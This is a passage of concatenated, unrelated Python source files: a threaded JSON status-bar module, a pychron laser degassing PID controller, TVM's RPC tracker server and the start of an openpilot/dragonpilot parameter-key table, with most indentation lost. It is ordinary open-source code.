)
def state(self, widget):
try:
if self.__error is not None:
return ["critical"]
elif self.__data["state.open"]:
return ["warning"]
else:
return []
except KeyError:
return ["critical"]
def update(self):
if not self.__thread or self.__thread.is_alive() == False:
self.__thread = threading.Thread(target=self.get_api_async, args=())
self.__thread.start()
def getState(self, widget):
text = self._format
if self.__error is not None:
text = self.__error
else:
try:
text = formatStringBuilder(self._format, self.__data)
except KeyError:
text = "KeyError"
return text
def get_api_async(self):
try:
with requests.get(self.__url, timeout=10) as request:
# Can't implement error handling for python2.7 if I use
# request.json() as it uses simplejson in newer versions
self.__data = self.__flatten(json.loads(request.text))
self.__error = None
except requests.exceptions.Timeout:
self.__error = "Timeout"
except requests.exceptions.HTTPError:
self.__error = "HTTP Error"
except ValueError:
self.__error = "Not a JSON response"
core.event.trigger("update", [self.id], redraw_only=True)
# left_mouse_button handler
def __forceReload(self, event):
if self.__thread:
self.__thread.raise_exception()
self.__error = "RELOADING"
core.event.trigger("update", [self.id], redraw_only=True)
# Flattens the JSON structure recursively, e.g. ['space']['open']
# becomes ['space.open']
def __flatten(self, json):
out = {}
for key in json:
value = json[key]
if type(value) is dict:
flattened_key = self.__flatten(value)
for fk in flattened_key:
out[key + "." + fk] = flattened_key[fk]
else:
out[key] = value
return out
# Author: Tobias Manske <tobias@chaoswg.xyz>
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
degasser.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from chaco.plot_containers import HPlotContainer
from enable.component_editor import ComponentEditor
from traits.api import HasTraits, Int, Float, Instance, Range, on_trait_change, Button
from traitsui.api import View, Item, UItem, ButtonEditor, HGroup, VGroup
# ============= standard library imports ========================
from numpy import uint8, zeros, random, uint16
from skimage.color import gray2rgb
from threading import Event, Thread
import yaml
import os
import time
# ============= local library imports ==========================
from pychron.core.pid import PID
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.graph.graph import Graph
from pychron.graph.stream_graph import StreamStackedGraph
from pychron.loggable import Loggable
from pychron.paths import paths
class LM:
def __init__(self, t, dt=1):
self._pid = PID(kp=-0.5, ki=0.1)
self._dt = dt
self._target_value = t
def set_laser_power_hook(self, *args, **kw):
pass
def get_brightness(self, v):
err = self._target_value - v
out = self._pid.get_value(err, self._dt)
src = random.randint(0, 255, (150, 150))
return src.astype(uint8), out
class Degasser(Loggable):
laser_manager = None
lumens = Float(50)
pid = Instance(PID)
stream_graph = Instance(StreamStackedGraph, ())
img_graph = Instance(Graph, ())
plot_container = Instance(HPlotContainer, ())
threshold = Range(0,100, 25)
test = Button
edit_pid_button = Button
save_button = Button
_lum_thread = None
_lum_evt = None
_luminosity_value = 0
_testing = False
_info = None
def stop(self):
self.debug('stop')
self.dump()
if self._lum_evt:
self._lum_evt.set()
if self._info:
invoke_in_main_thread(self._info.dispose, abort=True)
@property
def persistence_path(self):
return os.path.join(paths.setup_dir, 'pid_degasser.yaml')
def load(self):
self.debug('loading')
self.pid = PID()
p = self.persistence_path
if not os.path.isfile(p):
self.warning('No PID degasser file located at {}'.format(p))
return
with open(p, 'rb') as rfile:
jd = yaml.load(rfile)
if jd:
self.threshold = jd['threshold']
self.pid.load_from_obj(jd['pid'])
def dump(self):
self.debug('dump')
obj = self.pid.get_dump_obj()
jd = {'pid': obj, 'threshold': self.threshold}
with open(self.persistence_path, 'wb') as wfile:
yaml.dump(jd, wfile, encoding='utf-8')
def degas(self, lumens=None, autostart=True):
self.load()
if lumens is None:
lumens = self.lumens
self.lumens = lumens
self._setup_graph()
# def _open():
# self._info = self.edit_traits()
#
# invoke_in_main_thread(_open)
if autostart:
self.start()
def start(self):
self.pid.reset()
self._lum_evt = Event()
self._lum_thread = Thread(target=self._degas, args=(self.lumens, self.pid))
self._lum_thread.start()
def _edit_pid_button_fired(self):
info = self.pid.edit_traits(kind='livemodal')
if info.result:
self.dump()
def _save_button_fired(self):
self.dump()
def _test_fired(self):
if self._testing:
self.stop()
self.laser_manager.disable_laser()
self.stream_graph.export_data(path='/Users/argonlab3/Desktop/degas.csv')
else:
self.laser_manager.enable_laser()
self.start()
self._testing = not self._testing
def _setup_graph(self):
self.plot_container = HPlotContainer()
g = self.stream_graph
g.clear()
g.new_plot(padding_left=70, padding_right=10)
g.new_series(plotid=0)
g.set_y_title('Lumens', plotid=0)
g.new_plot(padding_left=70, padding_right=10)
g.new_series(plotid=1)
g.set_y_title('Error', plotid=1)
g.new_plot(padding_left=70, padding_right=10)
g.new_series(plotid=2)
g.set_y_title('Output', plotid=2)
g = self.img_graph
g.clear()
imgplot = g.new_plot(padding_right=10)
imgplot.aspect_ratio = 1.0
imgplot.x_axis.visible = False
imgplot.y_axis.visible = False
imgplot.x_grid.visible = False
imgplot.y_grid.visible = False
imgplot.data.set_data('imagedata', zeros((150, 150, 3), dtype=uint8))
imgplot.img_plot('imagedata', origin='top left')
self.plot_container.add(self.stream_graph.plotcontainer)
self.plot_container.add(self.img_graph.plotcontainer)
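    # Closed-loop degassing: every pid.kdt seconds the current brightness is read,
    # the error against the requested lumens is fed to the PID controller, and the
    # PID output is applied as the new laser power while lumens/error/output are
    # streamed to the graphs.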
def _degas(self, lumens, pid):
self.lumens = lumens
g = self.stream_graph
img = self.img_graph.plots[0]
def update(c, e, o, src):
g.record(c, plotid=0)
g.record(e, plotid=1)
g.record(o, plotid=2)
if src.dtype == uint16:
src = src.astype('uint32')
src = src/4095 * 255
src = src.astype('uint8')
imgdata = gray2rgb(src)
img.data.set_data('imagedata', imgdata)
evt = self._lum_evt
set_laser_power = self.laser_manager.set_laser_power_hook
get_brightness = self.laser_manager.get_brightness
target = self.lumens
prev = 0
while not evt.is_set():
dt = pid.kdt
st = time.time()
src, current = get_brightness(threshold=self.threshold)
err = target - current
out = pid.get_value(err) or 0
invoke_in_main_thread(update, current, err, out, src)
if abs(prev - out) > 0.02:
self.debug('set power output={}'.format(out))
set_laser_power(out)
prev = out
et = time.time() - st
t = dt - et
            if t > 0:
                evt.wait(t)
def traits_view(self):
v = View(VGroup(Item('pid', style='custom'),
Item('threshold', label='T'),
Item('test'),
UItem('plot_container', style='custom', editor=ComponentEditor())))
return v
if __name__ == '__main__':
d = Degasser(laser_manager=LM(30))
d.configure_traits()
# ============= EOF =============================================
#
# class PID(HasTraits):
# _integral_err = 0
# _prev_err = 0
# Kp = Float(0.25)
# Ki = Float(0.0001)
# Kd = Float(0)
# min_output = 0
# max_output = 100
#
# def get_value(self, error, dt):
# self._integral_err += (error * dt)
# derivative = (error - self._prev_err) / dt
# output = (self.Kp * error) + (self.Ki * self._integral_err) + (
# self.Kd * derivative)
# self._prev_err = error
# return min(self.max_output, max(self.min_output, output))
#
# def traits_view(self):
# v = View(
# Item('Kp'),
# Item('Ki'),
# Item('Kd'))
# return v
#
#
# class Degasser(MachineVisionManager, ExecuteMixin):
# _period = 0.05
# crop_width = Int(5)
# crop_height = Int(5)
#
# _test_lumens = Float(100)
# _test_duration = Int(10)
# _test_graph = Instance(StackedGraph)
# _test_image = Instance(MVImage)
# _testing = False
#
# pid = Instance(PID, ())
# _detector = Instance(LumenDetector)
#
# def degas(self, lumens, duration):
# """
# degas for duration trying to maintain
# lumens
# """
# if self.laser_manager:
# self.laser_manager.fiber_light.power_off()
#
# g = self._make_graph(lumens, duration)
# if self._testing:
# self._test_graph = g
# else:
# self.laser_manager.auxilary_graph = g.plotcontainer
#
# cw, ch = 2 * self.crop_width * self.pxpermm, 2 * self.crop_height * self.pxpermm
#
# # if not cw % 5 == 0:
# # cw += cw % 5
# # if not ch % 5 == 0:
# # ch += ch % 5
# #
# # cw, ch = 200, 200
#
# im = MVImage()
# im.setup_images(1, (cw, ch))
# if self._testing:
# self._test_image = im
# else:
# self.view_image(im)
#
# self._detector = LumenDetector()
# dt = self._period
#
# pid = self.pid
# st = time.time()
# i = 0
# while 1:
# ct = time.time()
# tt = ct - st
# if not self.isAlive():
# break
#
# cl = self._get_current_lumens(im, cw, ch)
#
# err = lumens - cl
# out = pid.get_value(err, dt)
# g.add_data(((tt, out), (tt, err), (tt, cl)))
#
# self._set_power(out, i)
#
# if tt > duration:
# break
# et = time.time() - ct
# time.sleep(max(0, dt - et))
#
# i += 1
# if i > 1e6:
# i = 0
#
# if self.laser_manager:
# self.laser_manager.fiber_light.power_on()
#
# self.executing = False
#
# def _set_power(self, pwr, cnt):
# if self.laser_manager:
# self.laser_manager.set_laser_power(pwr, verbose=cnt == 0)
#
# def _get_current_lumens(self, im, cw, ch):
# src = self.new_image_frame()
# if src:
# src = self._crop_image(src, cw, ch)
# else:
# src = random.random((ch, cw)) * 255
# src = src.astype('uint8')
# src, v = self._detector.get_value(src)
# im.set_image(src)
# return v
#
# def _make_graph(self, lumens, duration):
# g = StackedGraph(container_dict=dict(stack_order='top_to_bottom'))
# g.new_plot(ytitle='Output (W)')
# g.new_series()
# g.new_plot(ytitle='Residual')
# g.new_series(plotid=1)
# g.new_plot(ytitle='Lumens', xtitle='time (s)')
# g.new_series(plotid=2)
#
# g.add_horizontal_rule(lumens, plotid=2)
# g.set_x_limits(0, duration * 1.1)
# return g
#
# def _do_execute(self):
#
# self.debug('starting test degas {} {}'.format(self._test_lumens,
# self._test_duration))
# self._testing = True
# self.degas(self._test_lumens, self._test_duration)
#
# def traits_view(self):
# v = View(UItem('execute',
# editor=ButtonEditor(label_value='execute_label')),
# HGroup(Item('_test_lumens'), Item('_test_duration')),
# UItem('pid', style='custom'),
# HGroup(UItem('_test_graph',
# height=400,
# style='custom'),
# UItem('_test_image', style='custom')),
# resizable=True)
# return v
#
#
|
tracker.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""RPC Tracker, tracks and distributes the TVM RPC resources.
This folder implements the tracker server logic.
Note
----
Tracker is a TCP based rest api with the following protocol:
- Initial handshake to the peer
- RPC_TRACKER_MAGIC
- Normal message: [size(int32), json-data]
- Each message is initiated by the client, and the tracker replies with a json.
List of available APIs:
- PING: check if tracker is alive
- input: [TrackerCode.PING]
- return: TrackerCode.SUCCESS
- PUT: report resource to tracker
- input: [TrackerCode.PUT, [port, match-key]]
- return: TrackerCode.SUCCESS
  - note: match-key is a randomly generated key used to identify the resource during the connection.
- REQUEST: request a new resource from tracker
- input: [TrackerCode.REQUEST, [key, user, priority]]
- return: [TrackerCode.SUCCESS, [url, port, match-key]]
"""
# pylint: disable=invalid-name
import asyncio
import heapq
import logging
import socket
import threading
import errno
import struct
import json
from tvm.contrib.popen_pool import PopenWorker
try:
from tornado import ioloop
from . import tornado_util
except ImportError as error_msg:
raise ImportError(
"RPCTracker module requires tornado package %s. Try 'pip install tornado'." % error_msg
)
from .._ffi.base import py_str
from . import base
from .base import RPC_TRACKER_MAGIC, TrackerCode
logger = logging.getLogger("RPCTracker")
class Scheduler(object):
"""Abstract interface of scheduler."""
def put(self, value):
"""Push a resource into the scheduler.
This function can trigger callbacks in the scheduler.
Parameters
----------
value : object
The resource to be put in the scheduler.
"""
raise NotImplementedError()
def request(self, user, priority, callback):
"""Request a resource.
Parameters
----------
user : str
The user who is requesting the resource.
priority : int
The job priority
callback : function: value->bool
            Callback function to receive a resource when ready;
returns True if the resource is consumed.
"""
raise NotImplementedError()
def remove(self, value):
"""Remove a resource in the scheduler
Parameters
----------
value: object
The resource to remove
"""
def summary(self):
"""Get summary information of the scheduler."""
raise NotImplementedError()
class PriorityScheduler(Scheduler):
"""Priority based scheduler, FIFO based on request order"""
def __init__(self, key):
self._key = key
self._request_cnt = 0
self._lock = threading.Lock()
self._values = []
self._requests = []
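    # Requests live in a heap keyed by (-priority, arrival counter), so the highest
    # priority request is matched first and ties are served FIFO.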
def _schedule(self):
while self._requests and self._values:
value = self._values.pop(0)
item = heapq.heappop(self._requests)
callback = item[-1]
if callback(value[1:]):
value[0].pending_matchkeys.remove(value[-1])
else:
self._values.append(value)
def put(self, value):
self._values.append(value)
self._schedule()
def request(self, user, priority, callback):
with self._lock:
heapq.heappush(self._requests, (-priority, self._request_cnt, callback))
self._request_cnt += 1
self._schedule()
def remove(self, value):
if value in self._values:
self._values.remove(value)
self._schedule()
def summary(self):
"""Get summary information of the scheduler."""
return {"free": len(self._values), "pending": len(self._requests)}
class TCPEventHandler(tornado_util.TCPHandler):
"""Base asynchronize message handler.
The tracker and client follows a simple message protocol.
The message is in form [nbytes(int32)] [json-str].
All the information is packed in json-str
"""
def __init__(self, tracker, sock, addr):
super(TCPEventHandler, self).__init__(sock)
self._data = bytearray()
self._tracker = tracker
self._msg_size = 0
self._addr = addr
self._init_req_nbytes = 4
self._info = {}
# list of pending match keys that has not been used.
self.pending_matchkeys = set()
self._tracker._connections.add(self)
self.put_values = []
def name(self):
"""name of connection"""
return "TCPSocket: %s" % str(self._addr)
def summary(self):
"""Summary of this connection"""
return self._info
def _init_conn(self, message):
"""Initialize the connection"""
if len(message) != 4:
logger.warning("Invalid connection from %s", self.name())
self.close()
magic = struct.unpack("<i", message)[0]
if magic != RPC_TRACKER_MAGIC:
logger.warning("Invalid magic from %s", self.name())
self.close()
self.write_message(struct.pack("<i", RPC_TRACKER_MAGIC), binary=True)
self._init_req_nbytes = 0
def on_message(self, message):
"""Callback when a message is received.
Parameters
----------
message : bytearray
The bytes received
"""
assert isinstance(message, bytes)
if self._init_req_nbytes:
self._init_conn(message)
return
self._data += message
while True:
if self._msg_size == 0:
if len(self._data) >= 4:
self._msg_size = struct.unpack("<i", self._data[:4])[0]
else:
return
if self._msg_size != 0 and len(self._data) >= self._msg_size + 4:
msg = py_str(bytes(self._data[4 : 4 + self._msg_size]))
del self._data[: 4 + self._msg_size]
self._msg_size = 0
# pylint: disable=broad-except
self.call_handler(json.loads(msg))
else:
return
def ret_value(self, data):
"""return value to the output"""
data = json.dumps(data)
self.write_message(struct.pack("<i", len(data)), binary=True)
self.write_message(data.encode("utf-8"), binary=True)
def call_handler(self, args):
"""Event handler when json request arrives."""
code = args[0]
if code == TrackerCode.PUT:
key = args[1]
port, matchkey = args[2]
self.pending_matchkeys.add(matchkey)
# got custom address (from rpc server)
if len(args) >= 4 and args[3] is not None:
value = (self, args[3], port, matchkey)
else:
value = (self, self._addr[0], port, matchkey)
self._tracker.put(key, value)
self.put_values.append(value)
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.REQUEST:
key = args[1]
user = args[2]
priority = args[3]
def _cb(value):
# if the connection is already closed
if not self._sock:
return False
try:
self.ret_value([TrackerCode.SUCCESS, value])
except (socket.error, IOError):
return False
return True
self._tracker.request(key, user, priority, _cb)
elif code == TrackerCode.PING:
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.GET_PENDING_MATCHKEYS:
self.ret_value(list(self.pending_matchkeys))
elif code == TrackerCode.STOP:
# safe stop tracker
if self._tracker._stop_key == args[1]:
self.ret_value(TrackerCode.SUCCESS)
self._tracker.stop()
else:
self.ret_value(TrackerCode.FAIL)
elif code == TrackerCode.UPDATE_INFO:
info = args[1]
assert isinstance(info, dict)
if info["addr"][0] is None:
info["addr"][0] = self._addr[0]
self._info.update(info)
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.SUMMARY:
status = self._tracker.summary()
self.ret_value([TrackerCode.SUCCESS, status])
else:
logger.warning("Unknown tracker code %d", code)
self.close()
def on_close(self):
self._tracker.close(self)
def on_error(self, err):
logger.warning("%s: Error in RPC Tracker: %s", self.name(), err)
self.close()
class TrackerServerHandler(object):
"""Tracker that tracks the resources."""
def __init__(self, sock, stop_key):
self._scheduler_map = {}
self._sock = sock
self._sock.setblocking(0)
self._ioloop = ioloop.IOLoop.current()
self._stop_key = stop_key
self._connections = set()
def _event_handler(_, events):
self._on_event(events)
self._ioloop.add_handler(self._sock.fileno(), _event_handler, self._ioloop.READ)
def _on_event(self, _):
while True:
try:
conn, addr = self._sock.accept()
TCPEventHandler(self, conn, addr)
except socket.error as err:
if err.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
break
def create_scheduler(self, key):
"""Create a new scheduler."""
return PriorityScheduler(key)
def put(self, key, value):
"""Report a new resource to the tracker."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].put(value)
def request(self, key, user, priority, callback):
"""Request a new resource."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].request(user, priority, callback)
def close(self, conn):
self._connections.remove(conn)
if "key" in conn._info:
for value in conn.put_values:
_, _, _, key = value
rpc_key = key.split(":")[0]
self._scheduler_map[rpc_key].remove(value)
def stop(self):
"""Safely stop tracker."""
for conn in list(self._connections):
conn.close()
self._sock.close()
self._ioloop.stop()
def summary(self):
"""Return a dict summarizing current status."""
qinfo = {}
for k, v in self._scheduler_map.items():
qinfo[k] = v.summary()
cinfo = []
# ignore client connections without key
for conn in self._connections:
res = conn.summary()
if res.get("key", "").startswith("server"):
cinfo.append(res)
return {"queue_info": qinfo, "server_info": cinfo}
def run(self):
"""Run the tracker server"""
self._ioloop.start()
def _tracker_server(listen_sock, stop_key):
asyncio.set_event_loop(asyncio.new_event_loop())
handler = TrackerServerHandler(listen_sock, stop_key)
handler.run()
class PopenTrackerServerState(object):
"""Internal PopenTrackerServer State"""
current = None
def __init__(self, host, port=9190, port_end=9199, silent=False):
if silent:
logger.setLevel(logging.WARN)
sock = socket.socket(base.get_addr_family((host, port)), socket.SOCK_STREAM)
self.port = None
self.stop_key = base.random_key("tracker")
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [errno.EADDRINUSE]:
continue
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.thread = threading.Thread(target=_tracker_server, args=(sock, self.stop_key))
self.thread.start()
self.host = host
def _popen_start_tracker_server(host, port=9190, port_end=9199, silent=False):
# This is a function that will be sent to the
# Popen worker to run on a separate process.
# Create and start the server in a different thread
state = PopenTrackerServerState(host, port, port_end, silent)
PopenTrackerServerState.current = state
# returns the port so that the main can get the port number.
return (state.port, state.stop_key)
class Tracker(object):
"""Start RPC tracker on a separate process.
Python implementation based on PopenWorker.
Parameters
----------
host : str
The host url of the server.
port : int
The TCP port to be bind to
port_end : int, optional
The end TCP port to search
silent: bool, optional
Whether run in silent mode
"""
def __init__(self, host="0.0.0.0", port=9190, port_end=9199, silent=False):
if silent:
logger.setLevel(logging.WARN)
self.proc = PopenWorker()
# send the function
self.proc.send(
_popen_start_tracker_server,
[
host,
port,
port_end,
silent,
],
)
# receive the port
self.port, self.stop_key = self.proc.recv()
self.host = host
def _stop_tracker(self):
sock = socket.socket(base.get_addr_family((self.host, self.port)), socket.SOCK_STREAM)
sock.connect(("127.0.0.1", self.port))
sock.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
assert magic == base.RPC_TRACKER_MAGIC
base.sendjson(sock, [TrackerCode.STOP, self.stop_key])
assert base.recvjson(sock) == TrackerCode.SUCCESS
sock.close()
def terminate(self):
"""Terminate the server process"""
if self.proc:
if self.proc.is_alive():
self._stop_tracker()
self.proc.join(0.1)
if self.proc.is_alive():
logger.info("Terminating Tracker Server...")
self.proc.kill()
self.proc = None
def __del__(self):
try:
self.terminate()
except TypeError:
pass
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import string
import binascii
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
#dragonpilot config
"DragonEnableDashcam": [TxType.PERSISTENT],
"DragonEnableAutoShutdown": [TxType.PERSISTENT],
"DragonAutoShutdownAt": [TxType.PERSISTENT],
"DragonEnableSteeringOnSignal": [TxType.PERSISTENT],
"DragonEnableLogger": [TxType.PERSISTENT],
"DragonEnableUploader": [TxType.PERSISTENT],
"DragonNoctuaMode": [TxType.PERSISTENT],
"DragonCacheCar": [TxType.PERSISTENT],
"DragonCachedModel": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedFP": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedVIN": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedCarFW": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedSource": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonAllowGas": [TxType.PERSISTENT],
"DragonToyotaStockDSU": [TxType.PERSISTENT],
"DragonLatCtrl": [TxType.PERSISTENT],
"DragonUISpeed": [TxType.PERSISTENT],
"DragonUIEvent": [TxType.PERSISTENT],
"DragonUIMaxSpeed": [TxType.PERSISTENT],
"DragonUIFace": [TxType.PERSISTENT],
"DragonUIDev": [TxType.PERSISTENT],
"DragonUIDevMini": [TxType.PERSISTENT],
"DragonEnableTomTom": [TxType.PERSISTENT],
"DragonBootTomTom": [TxType.PERSISTENT],
"DragonRunTomTom": [TxType.PERSISTENT],
"DragonEnableAutonavi": [TxType.PERSISTENT],
"DragonBootAutonavi": [TxType.PERSISTENT],
"DragonRunAutonavi": [TxType.PERSISTENT],
"DragonEnableAegis": [TxType.PERSISTENT],
"DragonBootAegis": [TxType.PERSISTENT],
"DragonRunAegis": [TxType.PERSISTENT],
"DragonEnableMixplorer": [TxType.PERSISTENT],
"DragonRunMixplorer": [TxType.PERSISTENT],
"DragonSteeringMonitorTimer": [TxType.PERSISTENT],
"DragonCameraOffset": [TxType.PERSISTENT],
"DragonUIVolumeBoost": [TxType.PERSISTENT],
"DragonGreyPandaMode": [TxType.PERSISTENT],
"DragonDrivingUI": [TxType.PERSISTENT],
"DragonDisplaySteeringLimitAlert": [TxType.PERSISTENT],
"DragonChargingCtrl": [TxType.PERSISTENT],
"DragonCharging": [TxType.PERSISTENT],
"DragonDisCharging": [TxType.PERSISTENT],
"DragonToyotaLaneDepartureWarning": [TxType.PERSISTENT],
"DragonUILane": [TxType.PERSISTENT],
"DragonUILead": [TxType.PERSISTENT],
"DragonUIPath": [TxType.PERSISTENT],
"DragonUIBlinker": [TxType.PERSISTENT],
"DragonUIDMView": [TxType.PERSISTENT],
"DragonEnableDriverMonitoring": [TxType.PERSISTENT],
"DragonCarModel": [TxType.CLEAR_ON_MANAGER_START],
"DragonEnableSlowOnCurve": [TxType.PERSISTENT],
"DragonEnableLeadCarMovingAlert": [TxType.PERSISTENT],
"DragonToyotaSnGMod": [TxType.PERSISTENT],
"DragonWazeMode": [TxType.PERSISTENT],
"DragonRunWaze": [TxType.PERSISTENT],
"DragonEnableAutoLC": [TxType.PERSISTENT],
"DragonAssistedLCMinMPH": [TxType.PERSISTENT],
"DragonAutoLCMinMPH": [TxType.PERSISTENT],
"DragonAutoLCDelay": [TxType.PERSISTENT],
"DragonBTG": [TxType.PERSISTENT],
"DragonBootHotspot": [TxType.PERSISTENT],
"DragonAccelProfile": [TxType.PERSISTENT],
"DragonLastModified": [TxType.CLEAR_ON_MANAGER_START],
"DragonEnableRegistration": [TxType.PERSISTENT],
"DragonDynamicFollow": [TxType.PERSISTENT],
"DragonToyotaSngResponse": [TxType.PERSISTENT],
"DragonEnableGearCheck": [TxType.PERSISTENT],
"DragonEnableTempMonitor": [TxType.PERSISTENT],
"DragonAppAutoUpdate": [TxType.PERSISTENT],
"DragonUpdating": [TxType.CLEAR_ON_MANAGER_START],
"DragonCustomModel": [TxType.PERSISTENT],
"DragonSupportedCars": [TxType.PERSISTENT],
"DragonLocale": [TxType.PERSISTENT],
"DragonUIScreenOffReversing": [TxType.PERSISTENT],
"DragonEnableSRLearner": [TxType.PERSISTENT],
"DragonEnableSteerBoost": [TxType.PERSISTENT],
"DragonSteerBoostMin": [TxType.PERSISTENT],
"DragonSteerBoostMax": [TxType.PERSISTENT],
"DragonSteerBoostMinAt": [TxType.PERSISTENT],
"DragonSteerBoostMaxAt": [TxType.PERSISTENT],
"DragonDashcamHours": [TxType.PERSISTENT],
"DragonUIScreenOffDriving": [TxType.PERSISTENT],
"DragonEnableAutoUpdate": [TxType.PERSISTENT],
"DragonUIBrightness": [TxType.PERSISTENT],
"DragonDashcamImpactDetect": [TxType.PERSISTENT],
"DragonDashcamImpactDetectStarted": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
